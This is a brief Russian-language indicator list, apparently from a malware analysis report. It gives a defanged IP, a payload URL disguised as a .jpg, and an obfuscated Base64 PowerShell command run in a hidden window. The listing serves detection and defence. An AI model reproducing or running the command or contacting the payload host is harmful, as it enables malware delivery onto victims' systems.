Техническая информация
- '19#.#6.177.136':80
- http://19#.#6.177.136/xampp/knices/kn/new_image.jpg
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABiAGEAYwBrAGEAbAAgAD0AIAAnAHQAeAB0AC4AZABvAG8AZwBzAGkAZQBoAHMAZABuAGUAaQByAGYAbAByAGkAZwB0AHMAZQBiA... (со скрытым окном)